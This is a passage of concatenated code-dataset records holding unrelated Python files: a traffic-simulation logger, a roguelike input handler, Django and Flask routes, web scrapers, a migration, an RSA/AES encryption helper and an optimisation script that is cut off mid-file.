self.shi_yong_tian_shu,\n u'座位类型': self.zuo_wei_lei_xing,\n u'车票类型': self.che_piao_lei_xing,\n u'成人': self.cheng_ren,\n u'儿童': self.er_tong,\n u'青年': self.qing_nian,\n u'长者': self.zhang_zhe\n }","sub_path":"FieldGenerator/lvyou/huochepiao/guo_ji_huo_che_piao.py","file_name":"guo_ji_huo_che_piao.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"1977765","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport os, sys\nimport optparse\nimport random\n\n# Declares necessary path for SUMO_HOME variable\nif 'SUMO_HOME' in os.environ:\n tools = os.path.join(os.environ['SUMO_HOME'], 'tools')\n sys.path.append(tools)\nelse:\n sys.exit(\"please declare environment variable 'SUMO_HOME'\")\n\n\nfrom sumolib import checkBinary \nimport traci \nimport traci.constants as tc\nimport subprocess\nimport sumolib\nimport numpy as np\nimport pandas as pd\n\nfrom tqdm import tqdm\nfrom datetime import datetime\n\n\n\ndef get_edge_data(edge):\n # numerical data per edge\n edge_id = edge.getID()\n street_name = traci.edge.getStreetName(edge_id)\n co = traci.edge.getCOEmission(edge_id)\n co2 = traci.edge.getCO2Emission(edge_id)\n noise = traci.edge.getNoiseEmission(edge_id)\n num_veh = traci.edge.getLastStepVehicleNumber(edge_id)\n ped = traci.edge.getLastStepPersonIDs(edge_id) \n pmx_emission = traci.edge.getPMxEmission(edge_id)\n hc_emission = traci.edge.getHCEmission(edge_id)\n nox_emission = traci.edge.getNOxEmission(edge_id)\n data = [street_name, co, co2, noise, num_veh, ped, hc_emission, nox_emission, pmx_emission]\n return data\n\ndef get_tl_data(tl):\n # string format is necessary to view in stdout\n t_id = tl.getID()\n phase = str(traci.trafficlight.getPhase(t_id))\n state = str(traci.trafficlight.getRedYellowGreenState(t_id))\n switch = str(traci.trafficlight.getNextSwitch(t_id))\n data = [phase, state, switch]\n return data \n\ndef write_data_to_file(path, data_id, df, str_data_type, step):\n # path: where to save the files\n # data_id: name of kind of data; edge, tl, etc\n # df: dataframe \n # str_data_type: type_data\n # step: time interval in ticks\n\n suffix = '.csv'\n file_name = str(data_id) + '_' + str(str_data_type)\n destination_path = os.path.join(path, file_name + suffix)\n with open(destination_path, 'w') as f:\n df = pd.DataFrame(df)\n df.to_csv(destination_path, header=True, mode='w', index=False)\n return \n\ndef generate_edge_data(total_steps, num_entries, traci, edges, step):\n edge_series_data = {}\n for step in tqdm(range(total_steps)):\n traci.simulationStep()\n if step % 5 == 0:\n # Create the data per edge\n for e in edges[:num_entries]:\n edge_id = e.getID()\n edge_data = [step] + get_edge_data(e)\n print(edge_id,edge_data)\n if edge_id not in edge_series_data:\n edge_series_data[edge_id] = [['step', 'street_name','co', 'co2', 'noise','num_veh','ped','hc_emission','nox_emission']]\n else:\n edge_series_data[edge_id].append(edge_data)\n return edge_series_data\n\ndef generate_tl_data(total_steps, num_entries, traci, tl, step):\n tl_series_data = {}\n for step in tqdm(range(total_steps)):\n traci.simulationStep()\n if step % 5 == 0:\n # Create the data per edge\n for t in tl[:num_entries]:\n tl_id = t.getID()\n tl_data = [step] + get_tl_data(t)\n # print(\"edge_data\",edge_data)\n if tl_id not in tl_series_data:\n tl_series_data[tl_id] = [['step', 'phase', 'state', 'switch']]\n else:\n tl_series_data[tl_id].append(tl_data)\n return 
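tl_series_data\n\n# Note: both generators above advance SUMO one tick per loop via\n# traci.simulationStep() and sample only every 5th tick (step % 5 == 0), so a\n# run of total_steps ticks yields on the order of total_steps/5 samples per id,\n# collected in a dict keyed by edge/traffic-light id, i.e. 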
tl_series_data\n \ndef get_df(edge_data):\n # edge_data = 2D array of values\n # edge_df = pd.DataFrame.from_dict(edge_data, orient='index')\n edge_data = np.array(edge_data)\n print(edge_data)\n df = pd.DataFrame(data=edge_data[1:,1:], # values\n index=edge_data[1:,0], # 1st column as index\n columns=edge_data[0,1:]) # 1st row as the column names\n return df\n\n\n\n\nif __name__ == \"__main__\":\n\n # Sumo init and global simulatio parameters\n sumoBinary = checkBinary('sumo')\n sumo_cmd = [sumoBinary, \"-c\", \"osm.sumocfg\"]\n traci.start(sumo_cmd)\n step = 0 \n total_steps = 11 # steps taken by the simulation\n num_entries = 10 # number of edges or traffic lights you want to create files for\n date = datetime.now().strftime(\"%I-%M-%S-%B-%d-%Y\") # path parameter\n dir_name = r'\\edge_data' + '-'+ str(total_steps) + '-' + str(num_entries) + '' + date\n datafile_path = os.path.dirname(os.path.abspath(__file__)) + dir_name\n tl_dir_name = r'\\tl_data' + '-' + str(total_steps) + '-' + str(num_entries) + date\n tl_datafile_path = os.path.dirname(os.path.abspath(__file__)) + tl_dir_name\n\n net = sumolib.net.readNet('osm.net.xml')\n edges = net.getEdges()\n nodes = net.getNodes()\n tl = net.getTrafficLights()\n\n\n # Make new directories to store data for edge and traffic lights\n \n\n print(\"Starting Simulation...\")\n print(\"Generating Edge Data...\")\n edge_series_data = generate_edge_data(total_steps, num_entries, traci, edges, step)\n\n print(edge_series_data)\n if not os.path.exists(datafile_path):\n os.makedirs(datafile_path)\n\n print(\"Generating Data Files...\")\n for edge_id, edge_data in tqdm(edge_series_data.items()):\n edge_series_df = get_df(edge_data)\n write_data_to_file(datafile_path, edge_id, edge_data, 'edge', step)\n\n tl_series_data = generate_tl_data(total_steps, num_entries, traci, tl, step)\n\n if not os.path.exists(tl_datafile_path):\n os.makedirs(tl_datafile_path)\n\n print(\"Generating Traffic Light Data...\")\n for tl_id, tl_data in tqdm(tl_series_data.items()):\n # print(\"edge_data:\", edge_data)\n tl_series_df = get_df(tl_data)\n write_data_to_file(datafile_path, tl_id, tl_data, 'tl', step)\n\n traci.close()\n\n","sub_path":"2019-03-18-00-26-01/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"388688367","text":"import tcod\nfrom sim.control_handlers.input_handler import InputHandler\nfrom defs import legend\nfrom defs.game import GameTurn, GameMode\nfrom defs.input import controls, categories\nfrom defs.colors import palette\nfrom defs.render import RenderOrder\nfrom ecs.components import (\n Position,\n Velocity,\n Moveable,\n Controllable,\n Player,\n Cursor,\n Drawable,\n Item,\n PickedUp,\n)\n\n\nclass PlayHandler(InputHandler):\n def __init__(self, exit_func, ecs):\n super(PlayHandler, self).__init__(exit_func, ecs)\n\n def input_to_actions(self, sim, keyboard, mouse):\n if keyboard.vk == tcod.KEY_CHAR:\n char = keyboard.c\n\n # Movement\n if char == controls.Play.north.value:\n return {categories.MOVE: (0, -1)}\n elif char == controls.Play.south.value:\n return {categories.MOVE: (0, 1)}\n elif char == controls.Play.east.value:\n return {categories.MOVE: (1, 0)}\n elif char == controls.Play.west.value:\n return {categories.MOVE: (-1, 0)}\n\n # Other\n elif char == controls.Play.wait.value:\n return {categories.WAIT: True}\n elif char == controls.Play.pick_up.value:\n return {categories.PICK_UP: True}\n\n # Mode Changes\n # 
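Look Mode: pressing the bound key switches the handler into GameMode.look.\n            # Each branch returns a one-entry dict keyed by an input category; the\n            # payload is interpreted per category by handle_actions below.\n            # 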
Look Mode\n elif char == controls.Play.look_mode.value:\n return {categories.CHANGE_MODE: GameMode.look}\n\n def handle_actions(self, sim, actions):\n move = actions.get(categories.MOVE)\n wait = actions.get(categories.WAIT)\n pickup = actions.get(categories.PICK_UP)\n change_mode = actions.get(categories.CHANGE_MODE)\n turn_over = False\n\n if change_mode:\n self.change_to_look_mode(sim)\n\n if move:\n self.process_move(move, sim)\n turn_over = True\n\n if pickup:\n picked_up = self.process_pickup()\n turn_over = picked_up\n\n if wait:\n turn_over = True\n\n if turn_over and sim.mode is GameMode.play:\n sim.turn = GameTurn.ai_turn\n\n def process_pickup(self):\n cx = 0\n cy = 0\n player = None\n # Get the player position\n for ent, (_, pos) in self.ecs.get_components(Player, Position):\n cx = pos.x\n cy = pos.y\n player = ent\n\n if player:\n # Get Items at the player's position\n for ent, (_, pos) in self.ecs.get_components(Item, Position):\n if cx == pos.x and cy == pos.y:\n self.ecs.add_component(ent, PickedUp(player))\n return True\n else:\n return False\n\n def change_to_look_mode(self, sim):\n sim.mode = GameMode.look\n cx = 0\n cy = 0\n\n # Get the player position\n for ent, (_, pos) in self.ecs.get_components(Player, Position):\n cx = pos.x\n cy = pos.y\n\n # Create a cursor at the player position\n self.ecs.create_entity(\n Cursor(),\n Position(x=cx, y=cy),\n Moveable(),\n Velocity(),\n Controllable(),\n Drawable(\n legend=legend.SELECTION,\n bg=palette.selection_bg,\n fg=palette.selection_fg,\n render_order=RenderOrder.CURSOR,\n blend=tcod.BKGND_OVERLAY,\n ),\n )\n\n def process_move(self, move, sim):\n dx, dy = move\n for ent, (con, vel) in self.ecs.get_components(Controllable, Velocity):\n vel.x = dx\n vel.y = dy\n\n def handle_input(self, sim, keyboard, mouse):\n super().handle_input(sim, keyboard, mouse)\n if sim.turn is GameTurn.player_turn:\n actions = self.input_to_actions(sim, keyboard, mouse)\n if actions:\n self.handle_actions(sim, actions)\n","sub_path":"src/sim/control_handlers/play_handler.py","file_name":"play_handler.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"349531481","text":"from setuptools import find_packages\nfrom setuptools import setup\nimport os\n\n\nversion = '0.1'\nshortdesc = 'SQLAlchemy integration for cone.app'\nlongdesc = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()\nlongdesc += open(os.path.join(os.path.dirname(__file__), 'CHANGES.rst')).read()\nlongdesc += open(os.path.join(os.path.dirname(__file__), 'LICENSE.rst')).read()\n\n\nsetup(\n name='cone.sql',\n version=version,\n description=shortdesc,\n long_description=longdesc,\n classifiers=[\n 'Environment :: Web Environment',\n 'Programming Language :: Python',\n 'Topic :: Internet :: WWW/HTTP :: Dynamic Content',\n ],\n keywords='node pyramid cone web',\n author='BlueDynamics Alliance',\n author_email='dev@bluedynamics.com',\n url=u'https://github.com/bluedynamics/cone.sql',\n license='Simplified BSD',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n namespace_packages=['cone'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'zope.sqlalchemy',\n 'node.ext.ugm',\n 'repoze.tm2',\n 'repoze.retry',\n 'cone.app',\n ],\n extras_require=dict(\n test=[\n 'interlude',\n 'plone.testing',\n 'unittest2',\n ],\n ),\n tests_require=[\n 'interlude',\n 'plone.testing',\n 'unittest2',\n ],\n test_suite=\"cone.sql.tests.test_suite\",\n 
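# [Editor's sketch] The self.ecs.get_components(Player, Position) calls above
# follow an esper-style ECS query: yield (entity_id, (comp_a, comp_b, ...)) for
# every entity that owns *all* of the requested component types. A stand-in
# using a hypothetical {entity_id: {type: instance}} storage layout:
def get_components(entities, *component_types):
    for ent, comps in entities.items():
        if all(t in comps for t in component_types):
            yield ent, tuple(comps[t] for t in component_types)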
entry_points=\"\"\"\\\n [paste.filter_app_factory]\n session = cone.sql:make_app\n \"\"\"\n)\n","sub_path":"pypi_install_script/cone.sql-0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"469233609","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 31 20:44:36 2020\n\n@author: YinWang\n\"\"\"\n\nclass Solution(object):\n def reverseStr(self, s, k):\n \"\"\"\n :type s: str\n :type k: int\n :rtype: str\n \"\"\"\n res = \"\"\n l = len(s)\n index = 0\n while index < l//k:\n if index%2 == 0:\n res += s[k*index:k*(index+1)][::-1]\n else:\n res += s[k*index:k*(index+1)]\n index += 1\n if (l//k)%2 == 0 and l%k != 0:\n res += s[index*k:][::-1]\n if (l//k)%2 == 1 and l%k != 0:\n res += s[index*k:]\n return res","sub_path":"Week09/reverseStr.py","file_name":"reverseStr.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"509762831","text":"from django.conf.urls import url\nfrom django.views.generic import TemplateView\n\nfrom . import views\n\nurlpatterns = [\n\turl(r'^$', views.index, name='index'),\n\turl(r'^login/$', views.loginpage, name='login'),\n\turl(r'^ausschuesse/$', views.ausschuesse, name='ausschuesse'),\n\turl(r'^ausschuesse/bearbeiten/(?P.+)/neu$', views.ausschuesse_bearbeiten_neues_mitglied, name='ausschuesse_bearbeiten_neues_mitglied'),\n\turl(r'^ausschuesse/bearbeiten/(?P.+)$', views.ausschuesse_bearbeiten, name='ausschuesse_bearbeiten'),\n\turl(r'^beschluesse/$', views.beschluesse, name='beschluesse'),\n\turl(r'^beschluesse/entfernen/$', views.beschluesse_entfernen, name='beschluesse_entfernen'),\n\turl(r'^beschluesse/entfernen/(?P[0-9]+)/(?P.+)$', views.beschluesse_entfernen_ok, name='beschluesse_entfernen_ok'),\n\turl(r'^protokolle/$', views.protokolle, name='protokolle'),\n\turl(r'^protokolle/entfernen/$', views.protokolle_entfernen, name='protokolle_entfernen'),\n\turl(r'^protokolle/entfernen/(?P[0-9]+)/(?P[a-z]+)/(?P.+)$', views.protokolle_entfernen_ok, name='protokolle_entfernen_ok'),\n\turl(r'^dokumente/$', views.dokumente, name='dokumente'),\n\turl(r'^dokumente/entfernen/$', views.dokumente_entfernen, name='dokumente_entfernen'),\n\turl(r'^dokumente/entfernen/(?P[0-9]+)/(?P[0-9.]+)/(?P.+)$', views.dokumente_entfernen_ok, name='dokumente_entfernen_ok'),\n\turl(r'^dokumente/entfernen/(?P[0-9]+)/(?P.+)$', views.dokumente_entfernen_ok, name='dokumente_entfernen_ok'),\n\turl(r'^sitzungen/$', views.sitzungen, name='sitzungen'),\n\turl(r'^sitzungen/entfernen/$', views.sitzungen_entfernen, name='sitzungen_entfernen'),\n\turl(r'^sitzungen/entfernen/(?P[0-9]+)/(?P[^/]+)$', views.sitzungen_entfernen_ok, name='sitzungen_entfernen_ok'),\n\turl(r'^sitzungen/edit/(?P[0-9]+)/(?P[^/]+)/copyfrom/(?P[0-9]+)/(?P[^/]+)$', views.sitzungen_edit, name='sitzungen_edit_copy'),\n\turl(r'^sitzungen/edit/(?P[0-9]+)/(?P[^/]+)$', views.sitzungen_edit, name='sitzungen_edit'),\n\turl(r'^history/$', views.history, name='history'),\n]","sub_path":"amsel/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"396477122","text":"\"\"\"nba_persistence URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. 
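# [Editor's sketch] The reverseStr solution above handles the trailing partial
# chunk in two separate branches; the same "reverse every other k-sized chunk"
# rule collapses into one slice loop:
def reverse_str(s, k):
    chunks = [s[i:i + k] for i in range(0, len(s), k)]
    return "".join(c[::-1] if i % 2 == 0 else c for i, c in enumerate(chunks))
# reverse_str("abcdefg", 2) == "bacdfeg"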
Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Add an import: from blog import urls as blog_urls\n 2. Import the include() function: from django.conf.urls import url, include\n 3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom rest_framework import routers\n\nimport settings\nfrom data.views import TeamViewSet, PositionViewSet, SeasonViewSet, GameViewSet, BoxScoreViewSet, PlayerViewSet, DailyFantasySportsSiteViewSet, PlayerSalaryViewSet\n\nteam_list = TeamViewSet.as_view({\n 'get': 'list'\n})\n\nteam_detail = TeamViewSet.as_view({\n 'get': 'retrieve'\n})\n\nposition_list = PositionViewSet.as_view({\n 'get': 'list'\n})\n\nposition_detail = PositionViewSet.as_view({\n 'get': 'retrieve'\n})\n\nseason_list = SeasonViewSet.as_view({\n 'get': 'list'\n})\n\nseason_detail = SeasonViewSet.as_view({\n 'get': 'retrieve'\n})\n\nplayer_list = PlayerViewSet.as_view({\n 'get': 'list',\n})\nplayer_detail = PlayerViewSet.as_view({\n 'get': 'retrieve',\n})\n\ngame_list = GameViewSet.as_view({\n 'get': 'list'\n})\n\ngame_detail = GameViewSet.as_view({\n 'get': 'retrieve'\n})\n\nbox_score_list = BoxScoreViewSet.as_view({\n 'get': 'list'\n})\n\nbox_score_detail = BoxScoreViewSet.as_view({\n 'get': 'retrieve'\n})\n\ndaily_fantasy_sports_site_list = DailyFantasySportsSiteViewSet.as_view({\n 'get': 'list'\n})\n\ndaily_fantasy_sports_site_detail = DailyFantasySportsSiteViewSet.as_view({\n 'get': 'retrieve'\n})\n\nplayer_salary_list = PlayerSalaryViewSet.as_view({\n 'get': 'list'\n})\n\nplayer_salary_detail = PlayerSalaryViewSet.as_view({\n 'get': 'retrieve'\n})\n\nrouter = routers.SimpleRouter()\n\nurlpatterns = [\n url(r'^players/$', player_list, name='player-list'),\n url(r'^players/(?P[0-9]+)/$', player_detail, name='player-detail'),\n url(r'^teams/$', team_list, name='team-list'),\n url(r'^teams/(?P[0-9]+)/$', team_detail, name='team-detail'),\n url(r'^positions/$', position_list, name='position-list'),\n url(r'^positions/(?P[0-9]+)/$', position_detail, name='position-detail'),\n url(r'^seasons/$', season_list, name='season-list'),\n url(r'^seasons/(?P[0-9]+)/$', season_detail, name='season-detail'),\n url(r'^games/$', game_list, name='game-list'),\n url(r'^games/(?P[0-9]+)/$', game_detail, name='game-detail'),\n url(r'^box_scores/$', box_score_list, name='boxscore-list'),\n url(r'^box_scores/(?P[0-9]+)/$', box_score_detail, name='boxscore-detail'),\n url(r'^daily_fantasy_sports_sites/$', daily_fantasy_sports_site_list, name='dailyfantasysportssite-list'),\n url(r'^daily_fantasy_sports_sites/(?P[0-9]+)/$', daily_fantasy_sports_site_detail, name='dailyfantasysportssite-detail'),\n url(r'^player_salaries/$', player_salary_list, name='player_salary-list'),\n url(r'^player_salaries/(?P[0-9]+)/$', player_salary_detail, name='player_salary-detail'),\n url(r'^admin/', admin.site.urls),\n url(r'^', include(router.urls)),\n url(r'^static/(?P.*)$', 'django.views.static.serve', {'document_root': settings.STATIC_ROOT}),\n]\n","sub_path":"nba_persistence/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"361846052","text":"# .-. 
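# [Editor's note] The urls.py above binds every ViewSet action by hand even
# though a SimpleRouter is already instantiated; registering the ViewSets with
# that router generates equivalent list/detail routes. A hypothetical refactor,
# not the project's actual code:
#   router.register(r'players', PlayerViewSet, basename='player')
#   router.register(r'teams', TeamViewSet, basename='team')
#   urlpatterns = [url(r'^', include(router.urls))]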
coding=utf-8\nimport urllib2\nimport datetime\nfrom lxml import etree\nfrom kernel import collector\nfrom kernel.collector import object_found\n\nLIST_URL = 'http://www.amazon.cn/%E4%BF%83%E9%94%80-%E7%89%B9%E4%BB%B7/b/ref=cs_top_nav_gb27/475-8883503-9352433?ie=UTF8&node=42450071'\nLIST_XPATH = '//*[@id=\"hot\"]/div[1]/div[2]/ul/li'\nTITLE_PATH = 'div[2]/a'\nPREVIEW_PATH = 'div[1]/a/img'\nPRICE_PATH = 'div[3]/strong'\n\nclass AmazonCollector(collector.BaseCollector):\n    def fetch(self):\n        self.logger.info(\"Start fetching data from www.amazon.cn...\")\n        parser = etree.HTMLParser(encoding='gbk')\n        text = urllib2.urlopen(LIST_URL).read(-1)\n        tree = etree.HTML(text, parser=parser)\n\n        time = datetime.datetime.now().date().strftime('%Y-%m-%d')\n        nodes = tree.xpath(LIST_XPATH)\n        for node in nodes:\n            node1 = node.find(TITLE_PATH)\n            #print etree.tostring(node, method='html', encoding='utf-8')\n            title = node1.attrib['title']\n            url = node1.attrib['href']\n            node2 = node.find(PREVIEW_PATH)\n            preview = node2.attrib['src']\n            node3 = node.find(PRICE_PATH)\n            price = node3.text\n            self.logger.info(\"%s: %s - %s\" % (time, title, url))\n            self.logger.info(\"%s - %s\" % (price, preview))\n            object_found.send(self, time=time, title=title, url=url, preview=preview, price=price)","sub_path":"collectors/interesting/amazon.py","file_name":"amazon.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"649132722","text":"\"\"\"empty message\n\nRevision ID: d3189cb5fe01\nRevises: 2f2eb852559d\nCreate Date: 2018-03-02 16:58:09.525796\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd3189cb5fe01'\ndown_revision = '2f2eb852559d'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    ### commands auto generated by Alembic - please adjust! ###\n    op.add_column('cluster', sa.Column('executor_cores', sa.Integer(), nullable=False))\n    op.add_column('cluster', sa.Column('executor_memory', sa.String(length=15), nullable=False))\n    op.add_column('cluster', sa.Column('executors', sa.Integer(), nullable=False))\n    op.add_column('cluster', sa.Column('general_parameters', sa.String(length=1000), nullable=False))\n    ### end Alembic commands ###\n\n\ndef downgrade():\n    ### commands auto generated by Alembic - please adjust! 
###\n    op.drop_column('cluster', 'general_parameters')\n    op.drop_column('cluster', 'executors')\n    op.drop_column('cluster', 'executor_memory')\n    op.drop_column('cluster', 'executor_cores')\n    ### end Alembic commands ###\n","sub_path":"migrations/versions/d3189cb5fe01_.py","file_name":"d3189cb5fe01_.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"520608722","text":"from Crypto.PublicKey import RSA\r\nfrom Crypto.Random import get_random_bytes\r\nfrom Crypto.Cipher import AES, PKCS1_OAEP\r\nfrom io import BytesIO\r\n\r\nclass Criptografia:\r\n    \r\n    \r\n    def criaChaves(self):\r\n        \r\n        # create an RSA key pair\r\n        key = RSA.generate(2048)\r\n        # export the public and private keys\r\n        private_key= key.export_key()\r\n        public_key= key.publickey().export_key()\r\n        # build the key dictionary\r\n        chaves={\"private\":private_key, \"public\":public_key}\r\n        return chaves\r\n\r\n    def criptografar(self, pub, texto):\r\n        # variables\r\n        lista=[]\r\n        crip=''\r\n        texto=str(texto)\r\n        # import the RSA public key\r\n        chave_rsa_pub=RSA.import_key(pub)\r\n        session=get_random_bytes(16)\r\n        \r\n        # encrypt the session key with RSA\r\n        chave_rsa= PKCS1_OAEP.new(chave_rsa_pub)\r\n        enc_ses=chave_rsa.encrypt(session)\r\n        \r\n        # encrypt the data with AES\r\n        chavAes = AES.new(session, AES.MODE_EAX)\r\n        text, tag = chavAes.encrypt_and_digest(texto.encode(\"utf8\"))\r\n        [lista.append(x) for x in(enc_ses, chavAes.nonce, tag, text)]\r\n        crip=b''.join(lista)\r\n\r\n        return crip\r\n    \r\n    def descriptografar(self, priv, texto):\r\n        chave_rsa= RSA.import_key(priv)\r\n        entrada=BytesIO(texto)\r\n\r\n        chave_priv ,nonce, tag, text=\\\r\n        [entrada.read(x) for x in(chave_rsa.size_in_bytes(),16,16,-1)]\r\n\r\n        # decrypt the session key with RSA\r\n        cipher_rsa = PKCS1_OAEP.new(chave_rsa)\r\n        session_key = cipher_rsa.decrypt(chave_priv)\r\n\r\n        # decrypt the data with AES\r\n        chave_aes = AES.new(session_key, AES.MODE_EAX, nonce)\r\n        descrip = chave_aes.decrypt_and_verify(text, tag)\r\n        \r\n        return descrip.decode(\"utf-8\")\r\n    \r\n\r\n","sub_path":"src/packages/CriptografiaRSA.py","file_name":"CriptografiaRSA.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"308788813","text":"import json\n\nfrom flask import Blueprint, jsonify, render_template\n\n# register the blueprint\ninsight_controller = Blueprint('insight_controller', __name__)\n\n# route: '/insight/data/history'\n# returns: json, fetched from the 'static/model_history/history.json' -file\n@insight_controller.route('/data/history')\ndef insight_data_history():\n    with open('static/model_history/history.json', 'r') as file:\n        op = json.load(file)\n    return jsonify(op)\n\n# route: '/insight/data/report'\n# returns: json, fetched from the 'static/model_history/classification_report.json' -file\n@insight_controller.route('/data/report')\ndef insight_data_report():\n    with open('static/model_history/classification_report.json', 'r') as file:\n        op = json.load(file)\n    return jsonify(op)\n\n# route: '/insight/data/confusion_matrix'\n# returns: json, fetched from the 'static/model_history/confusion_matrix.json' -file\n@insight_controller.route('/data/confusion_matrix')\ndef insight_data_confusion_matrix():\n    with open('static/model_history/confusion_matrix.json', 'r') as file:\n        op = json.load(file)\n    return jsonify(op)\n\n# route: '/insight/data/current_situation'\n# returns: json, fetched from the 'static/model_history/situations.json' 
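# [Editor's sketch] Round-trip usage of the hybrid RSA+AES class above: generate
# a key pair, encrypt with the public key, decrypt with the private key. The
# blob layout is enc_session_key | nonce | tag | ciphertext, which is exactly
# what descriptografar slices back apart:
c = Criptografia()
keys = c.criaChaves()
blob = c.criptografar(keys["public"], "hello world")
assert c.descriptografar(keys["private"], blob) == "hello world"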
-file\n@insight_controller.route('/data/current_situation')\ndef insight_data_current_situation():\n with open('static/model_history/situations.json', 'r') as file:\n cs = json.load(file)\n return jsonify(cs)\n","sub_path":"controllers/insight_controller.py","file_name":"insight_controller.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"223046763","text":"#!/usr/bin/env python\nimport os\nfrom setuptools import setup, find_packages\n\nversion = __import__('hipsaint').__version__\n\nsetup(\n name = \"hipsaint\",\n version = version,\n\n description = \"\",\n long_description = file(\n os.path.join(\n os.path.dirname(__file__),\n \"README.md\"\n )\n ).read(),\n author = \"Hannes Ljungberg\",\n author_email = \"hannes@5monkeys.se\",\n url = \"http://github.com/hannseman/hipsaint\",\n download_url = \"https://github.com/5monkeys/hipsaint/tarball/%s\" % (version,),\n\n keywords = [\"nagios\", \"hipchat\", \"api\", \"plugin\"],\n classifiers = [\n \"Programming Language :: Python\",\n \"Development Status :: 3 - Alpha\",\n \"Natural Language :: English\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Operating System :: OS Independent\",\n \"Topic :: Utilities\"\n ],\n\n zip_safe = False,\n packages = find_packages(exclude=[\"examples\"]),\n include_package_data = True,\n\n install_requires = [\n \"Jinja2==2.6\",\n \"requests==0.13.0\"\n ],\n\n entry_points=\"\"\"\n [console_scripts]\n hipsaint=hipsaint.bin.commands:main\n\t\"\"\"\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"162335850","text":"import requests\nfrom bs4 import BeautifulSoup\nimport lxml\nimport json\nimport execjs\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QTableWidgetItem\nimport sys\n\n# 初始化变量\n\n\nclass report:\n def __init__(self, hot,againest):\n self.hot = hot\n self.againest = againest\n def show(self):\n print(self.hot)\n print(self.againest)\n def put(self):\n\n for i in range(9):\n print( self.hot[str(i+1)][\"used_rate\"])\n\n\nladder_hot_wild='data1'\nladder_againest_wild='data2'\nladder_hot_standard='data3'\nladder_againest_standard ='data4'\n\n# 主体部分 数据获取\nhtml = requests.get(\"http://lushi.163.com/bigdata/\")\nsoup=BeautifulSoup(html.text)\n\na=soup.find_all('script', {'type': 'text/javascript'})\n\nfor i in a:\n try:\n if 'tianti' in i['src']:\n data=i['src']\n break\n except:\n pass\n\n# 字符串处理\na=requests.get(data).text\nb=a.split('\\n')\nb=b[0:-1]\nb=','.join(b)\nb=b.replace('=',':')\nb='{'+b+'}'\nb=b.replace('var','')\nb=eval(b)\nlist1=[i for i in b]\n\nreport1 = report(b[list1[0]], b[list1[1]])\nreport1.put()","sub_path":"废弃备用参考代码/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"595486247","text":"\"\"\"\nThis code aims at implementing DFP algorithm to search the optimal resolution.\n\nAuthor: Yichong Huang (黄毅翀)\nStudent Code: 20S103272\n\"\"\"\n\nimport numpy as np\nimport numpy.linalg as lg\n\ndf = lambda x: np.array([[20 * x[0][0]], [2 * x[1][0]]])\nx = np.array([[0.1], [1]])\nH = np.eye(2)\nepsilon = 1e-5\ns = 1000\n\nwhile np.average(np.abs(s)) > epsilon:\n x1 = x - lg.inv(H).dot(df(x))\n s = x1 - x\n y = df(x1) - df(x)\n tmp = y - H.dot(s)\n H = H + tmp.dot(tmp.T) / ((tmp.T).dot(s))\n x = 
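# [Editor's sketch] The four near-identical Flask handlers above differ only in
# which JSON file they serve; one parameterized route with a whitelist keeps
# the behaviour without the duplication (a hypothetical refactor):
ALLOWED = {"history", "report", "confusion_matrix", "situations"}

@insight_controller.route('/data/files/<name>')
def insight_data_file(name):
    if name not in ALLOWED:
        return jsonify(error="unknown dataset"), 404
    with open('static/model_history/%s.json' % name, 'r') as f:
        return jsonify(json.load(f))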
